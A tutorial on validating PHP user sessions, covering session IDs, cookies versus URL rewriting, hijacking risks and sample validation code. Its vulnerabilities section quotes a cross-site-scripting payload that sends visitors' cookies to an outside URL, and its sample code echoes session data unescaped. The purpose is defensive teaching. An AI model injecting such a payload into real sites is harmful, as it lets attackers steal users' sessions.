Validating PHP User Sessions

What are Sessions for?

Before we start digging into how to manage user sessions, it is important to first understand what sessions are for. In a nutshell, sessions are the way that we “maintain state” from one page to the next, that is, how we identify specific users across multiple page requests. The ability to track users as they go from one page to the next using sessions allows us a number of options, such as tracking where they are going (web statistics) or to verify credentials for a specific section of the site.
Let’s say that a user comes to your site and goes to page foo.php. On foo.php there is the ability to customize the page so that it only displays the information that the user wants to see, which we’ll assume is done via some handy JavaScript/DHTML. The user follows the instructions and modifies the page to match what s/he wants to view every day. The next day the user comes back to find that all the work that s/he did was in vain, because the page was unable to maintain the choices after the user left the page.
Clearly the above example would frustrate most users and they would not want to keep coming back to your site. So, in order to allow the user to make changes that will be maintained, we have to have a way to store the user’s choices (most likely a database), and a way to identify unique users so that we can tell the difference between user A and user B when both are logged in simultaneously, which is where Sessions come into play. When the user comes to the site, we need to be able to give them a unique identifier (a session id) that will allow us to know the difference between each user on the site. So, when the user logs in, and then modifies their choices for foo.php, we know whose profile to save those changes to.

Validating PHP User Sessions

How do Sessions Work?

A session works by assigning a unique identifier to a user when they come to the site. A good session identifier needs to have enough characters to make it difficult for someone to guess, or for a program to find quickly, to help avoid hacking. So, generally speaking, a session identifier should be at least 32 random alpha-numeric characters or longer, though for the sake of brevity our session identifier in this article will be XYZ.
Unfortunately, since the web has no inherent way of maintaining state, assigning a unique identifier isn’t as simple as it sounds. We need a way for this session identifier to be passed to every page that the user visits. There are 2 primary ways that session identifiers generally get passed along to subsequent pages. The first is via URL rewriting, which will append ?PHPSESSID=XYZ to the end of all of the links on a page. This has the advantage of being usable by all web users since it merely modifies the links, but has some disadvantages in that it can be easily lost using the back button, and there are also some security vulnerabilities to using URL rewriting that will be discussed later. The other primary way of storing the session identifier is by using cookies, which are stored on the user’s computer invisibly. Cookies have the advantage that they can be stored on the user’s computer either until the browser window is closed or until a specified date (for “remember me” functions). The negative aspect to cookies is that, while most users have cookies enabled, some choose to disable that feature.
Fortunately, for those who don’t want to hassle with figuring all of this out for a custom session management script, PHP, makes session management very easy. In order to initiate a session, all you have to do is call session_start() before outputting anything to the browser. When session_start() is called, PHP will automatically create the session if one doesn’t exist, or read the session that already exists, and it will handle the URL rewriting and/or cookie setting internally. Using PHP will reduce your flexibility for things like “remember me” functions, but it’s also much easier to get started on in learning how Sessions work.
Anyway, once a session is created, you can create variables in the PHP auto-global variable, $_SESSION, as simply as you would create any other variable. Those variables will then be stored in a file on the web-server (not the client’s computer), so they are safe from modification by the user. Below is an example of how easy it can be to store information in a session. On the first page load there is no session, so it will create one and set the variables for name and e-mail, then if the page is reloaded, it will output the values that were set on the first page load:
<?php
session_start();

if( isset($_SESSION['name']) ) {
  echo("Hello {$_SESSION['name']} 
        <{$_SESSION['email']}>");
}
else {
  $_SESSION['name']   = "John Doe";
  $_SESSION['email']  = "john.doe@mysite.com";
  echo("Session created, refresh page");
}
?>

Validating PHP User Sessions

Session Vulnerabilities

Unfortunately, while PHP makes it easy to create sessions, there are many ways for session security to be compromised. Probably the easiest way that a session can be compromised is when URL rewriting is done. Since URL rewriting puts the session identifier directly into the URL, an unwary user who copies and pastes his or her URL and sends it to people will inadvertently be compromising the session. Also, if the site links to external sites, the session identifier may show up in referrer logs on the other site. So, for these reasons, it is generally considered safer to use cookies.
Another simple way that sessions can be compromised is when users are using public computers. When using cookies, there is the potential that the cookie could be left on the computer after the user is finished, leaving an open door. Alternatively, if URL rewriting is used, a session could be compromised as simply as the subsequent user browsing through the history. If the user doesn’t manually click “logout” or closes the browser thinking that it will automatically log him or her out there are a number of potential security risks when using URL rewriting, when the cookie has an expiration time instead of ending when the browser window closes, and--particularly--if the session doesn’t “timeout” within a short amount of time.
The most creative way that I have seen sessions compromised, however, is generally done on bulletin boards, etc., that allow HTML user input to be displayed on the site. A hacker will register on the site, and then make posts in various places on the site that allow HTML input. Within those posts, s/he will include some JavaScript that will insert an image tag, which is actually a link to an application that harvests cookie data. This is done similar to what you see below:
<script type='text/javascript'>
  document.write("<img src='http://site.com/url.php?cookie="+
    document.cookie+"' />");
</script>
In the above script, the hacker is putting the JavaScript “document.cookie” into the URL. So, when the user’s browser parses the JavaScript and attempts to load the image, it also sends along the viewing user’s cookie information, which compromises that user’s session. The hacker can then, at his or her leisure, go through the list of session identifiers hoping to find someone with admin access, etc., in order to hack the site.
All of the above is not to mention the more active hackers who either write programs that will continually try to brute-force their way into a system by trying random session identifiers, or someone who is able to gain access to network traffic and read any non-encrypted traffic--thereby potentially gaining access to all session data being passed to a site. I doubt that most websites will ever have to worry about these kinds of attacks unless they become a high profile site. Nonetheless, it is good to know the possibilities, which makes clear that some precautions need to be taken other than blindly accepting the session identifier, which will be discussed next.

Validating PHP User Sessions

Session Security

First of all, because of the public computer risk, your design should be such that the logout button is always visible when logged in, so that the user can easily log out at any time. Your PHP configuration options (or custom script) should be set so that sessions will “timeout” after approximately 20 minutes of inactivity. If you don’t have access to the PHP configuration options on shared hosting and it doesn’t timeout after 20 minutes or so, then you should store the “last access time” in the session itself and destroy the session if it is accessed after a time of inactivity. Also, if you manually set a cookie (using a custom script) you should set it so that it is destroyed when the browser window is closed not by an expiration date (PHP’s session_start() sets the cookie this way by default). If you do need to set an expiration date, such as for a “remember me” function, it should not be set by default, and should only be used when the user explicitly checks a box that says “remember me” since only the user will know whether or not they are on a public computer.
Secondly, in order to protect your session as much as possible, you need to find as many unique aspects of the user’s computer as you can find, and verify that they stay the same across all page requests. The most common security precaution here is to verify that the IP address stays the same. It is possible that a hacker could be at the same IP address as the valid user, or perhaps even IP spoof, but it is more unlikely. However, depending on your needs for security versus ease-of-use, and whether or not you need sessions to span hours or days (for “remember me” functions) you need to bring this into balance with the fact that a user’s IP address can potentially change throughout a session, particularly with large dial-up companies like AOL, etc. This means that the valid user may potentially get bumped. For this reason, applications like the open source phpbb bulletin board only verify the first 6 characters of the IP address by default, to make it less likely that a user will get bumped from an ISP generated IP change.
It would be nice if every browser sent out a unique 32-64 character id to identify it that JavaScript would not be allowed to access so that the only hackers that could get through would be the ones who were able to listen to the site’s traffic. However, until that time, the next best thing that I have found, which I use in my own code, is to verify that the user maintains the same user-agent across all page requests. The user-agent environment variable changes depending on browser, version, and operating system, etc., especially in IE. It is entirely possible for a hacker to have the same user-agent and/or to spoof it if they know what it is. So, it is, clearly, not even close to being bullet-proof. However, it is simply one extra step that can be taken to help keep hackers out, and combined with an IP check, it’s a step that makes it just a tiny bit less likely for someone to get through.
Finally, one of the most important things is to make sure you validate user-input so that hackers can’t compromise your sessions using JavaScript. If you have a site that allows users to fill out forms to enter text onto the site, if at all possible, you should try to avoid allowing HTML to be entered into the forms. You can either strip out all HTML tags using the strip_tags() method built into PHP, or you can change HTML markup to its HTML equivalent (e.g. < becomes &lt;), which can also be done easily using the htmlentities() method built into PHP. If you must allow HTML, then you should try to make sure that event handlers and <script> tags are not allowed into the content, which requires more difficult parsing.
Now, it is important to know that even with all of the above, the site is still not “safe”. For one, unless you are using SSL on the site, the session identifier, the IP address, and the user-agent are all being sent to the server in plain text. This means that a good hacker, listening to the server traffic, will still be able to hack into the system fairly easily. If the data you are protecting is important, then your best course of action is, on top of taking all the previously mentioned precautions, enabling SSL on the server so that all data exchange is encrypted.
On the next page, I have provided a simplified example of doing a manual timeout as well as verifying IP address and user-agent to validate a session. It is my recommendation that if the credentials don’t match, that you immediately destroy the session to ensure that the hacker can’t keep trying different things after finding a valid session identifier. This will log out the valid user, but is worthwhile to do so.

Validating PHP User Sessions

<?php
session_start();

// unset all session variables, and destroy session
function destroySession($p_strMessage) {
	session_unset();
	session_destroy();
	echo($p_strMessage);
	exit;
}

if( isset($_SESSION['name']) ) {
	// verify first 6 chars of IP
	if( substr($_SESSION['ip_address'],0,6)
        != substr($_SERVER['REMOTE_ADDR'],0,6) ) {
		destroySession("Invalid IP Address");
	}
	// verify user-agent is same
	elseif( $_SESSION['user_agent'] 
	        != $_SERVER['HTTP_USER_AGENT'] ) {
		destroySession("Invalid User-Agent");
	}
	// verify access within 20 min
	elseif( (time()-1200) > $_SESSION['last_access'] ) {
		destroySession("Session Timed Out");
	}
     // valid session
	else {
		echo("Logged In<br /><br />
		Hello {$_SESSION['name']} 
        <{$_SESSION['email']}>
		Session ID: {$_COOKIE['PHPSESSID']}");
	}
}
else {
  $_SESSION['name']   		= "John Doe";
  $_SESSION['email']  		= "john.doe@mysite.com";
  $_SESSION['ip_address']	= $_SERVER['REMOTE_ADDR'];
  $_SESSION['user_agent']	= $_SERVER['HTTP_USER_AGENT'];
  $_SESSION['last_access']	= time();
  echo("Session created, refresh page");
}
?>

Conclusion

In the above script, we are again loading the information on the first page load, and then just validating the information and outputting it on subsequent loads. To make this script useful, you must do a user login-validation before assigning the user’s data to the session, and if the user’s login is valid, you assign the user-id that you will need to identify that user session and any values that you want quick access to for script operation. However, as you have hopefully seen, PHP makes session handling very easy.
Unfortunately, in many cases, you may want more flexibility than what PHP offers by default--such as the ability to have “remember me” functions--but this requires that you set up your own way to store information (generally a database), which then requires that you set up additional algorithms to control when and how sessions get deleted, etc. However, that is going to have to wait for a later article. In the meantime, learning to use PHP sessions will set you up to understand better what you will need in order to develop your own session management application.